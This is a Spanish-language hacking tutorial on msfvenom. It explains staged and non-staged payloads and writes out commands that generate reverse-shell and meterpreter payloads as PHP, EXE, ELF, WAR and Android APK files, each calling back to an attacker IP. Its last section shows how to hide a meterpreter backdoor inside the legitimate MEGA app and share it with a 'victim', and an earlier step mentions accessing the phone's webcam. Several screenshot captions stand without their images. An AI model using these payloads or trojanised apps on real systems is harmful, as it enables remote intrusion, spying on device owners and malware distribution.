Tabla de Contenidos
MSFVENOM
Msfvenom es una herramienta de línea de comandos que forma parte del framework de pruebas de penetración Metasploit. Se utiliza para generar y personalizar payloads (cargas útiles) maliciosos que pueden ser utilizados en ataques de pruebas de penetración y en la explotación de vulnerabilidades en sistemas informáticos.
Tipos de payloads
Hay dos tipos de payloads, los staged y los non-staged:
- Payload Staged : El Payload Staged es un tipo de carga útil que se descompone en dos o más partes. La primera parte consiste en un fragmento de código que se envía al objetivo con el fin de establecer una conexión segura entre el atacante y la máquina objetivo. Una vez que se establece esta conexión, la segunda parte del payload, que es la verdadera carga útil del ataque, se envía. Este enfoque le da a los atacantes la capacidad de evadir medidas de seguridad adicionales, ya que la verdadera carga útil no se envía hasta que se establece una conexión segura.
- Payload non-staged : Es un tipo de carga útil que se envía como una única entidad y no se divide en múltiples partes. En otras palabras, la carga útil completa se envía al objetivo en un solo paquete y se ejecuta inmediatamente después de ser recibida. Aunque este enfoque es más simple que el Payload Staged, es más fácilmente detectable por los sistemas de seguridad, ya que todo el código malicioso se envía de una sola vez, lo que puede hacer que sea más fácilmente identificado y bloqueado.
Fichero PHP malicioso con msfvenom
Para generar un archivo de reverse shell en PHP utilizando msfvenom, puedes utilizar el siguiente comando:
msfvenom -p php/reverse_php LHOST=<tu dirección IP> LPORT=<tu puerto> -f raw > reverse_shell.php
Una vez que hayas generado el archivo de reverse shell en PHP, puedes transferirlo a la máquina objetivo y ejecutarlo en un servidor web para establecer una conexión de reverse shell con la máquina atacante.
Fichero EXE malicioso con msfvenom
Podemos también generar un payload para entablar una reverse shell en forma de meterpreter en metasploit desde una máquina windows a nuestra máquina atacante, generando el siguiente payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -f exe -o pwned.exe
Una vez generado esto, tenemos que abrir el /multi/handler de metasploit seleccionando como payload el meterpreter:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
Y ahora desde la máquina víctima, ejecutamos el script creado anteriormente:
Y recibimos sesión de meterpreter:
Aunque también podemos crear un payload que no sea de meterpreter, sino para recibir una shell normal, haciéndolo de la misma forma:
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
Fichero ELF malicioso con msfvenom
Los ficheros elf en linux se pueden asemejar a los exe de windows, por lo que haremos lo mismo de antes pero para linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT=443 -f elf -o pwned.elf
Lo compartimos con la máquina víctima:
Nos ponemos en la escucha con metasploit usando el payload de meterpreter para linux:
set PAYLOAD linux/x64/meterpreter/reverse_tcp
Ejecutamos el archivo en la máquina víctima y recibimos la conexión:
Fichero WAR malicioso con msfvenom para hacking tomcat
Estamos ante un servidor tomcat, que por ejemplo se trata de la máquina MAQUINA DEPLOY, donde dentro del puerto 8080 corre un servidor tomcat y se nos muestra que podemos subir un archivo WAR:
msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.37 LPORT=443 -f war -o revshell.war
Lo creamos
Lo subimos y lo tenemos aquí dentro del servidor, donde hacemos clic:
Y recibimos la conexión:
- —
Crear APK maliciosa
Podemos también crear un payload dentro de un apk y establecer una sesión de meterpreter en metasploit, por tanto usaremos el siguiente comando:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT=443 > virus.apk
Y ahora con metasploit estaremos en la escucha con el multi handler, además de establecer el payload correcto:
set payload android/meterpreter/reverse_tcp
Si la ejecutamos desde un dispositivo android habremos recibido una sesión de meterpreter:
Y podemos acceder a la webcam:
Esconder backdoor en apk legítima
Primero tenemos que instalar apktool en nuestro kali:
Y también nos bajamos la última versión del apktool:
Otorgamos permisos a los 2 archivos:
Movemos los dos archivos al siguiente directorio:
Y dentro del /usr/local/bin tenemos que renombrar el fichero .jar de esta forma:
Y ahora si ejecutamos el apktool debería funcionar bien:
Y ahora instalaremos estos 3 paquetes:
Ahora el siguiente paso será descargar un apk legítima, por ejemplo la de mega:
Y ahora una vez descargado el apk lo pasamos por msfvenom:
msfvenom -x mega.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.36 LPORT=443 -o mega_virus.apk
Lo pasamos al dispositivo android y ahora con metasploit nos ponemos en la escucha:
Nos compartimos el apk con la víctima y con metasploit nos ponemos en la escucha, poniendo este payload:
set payload android/meterpreter/reverse_tcp

























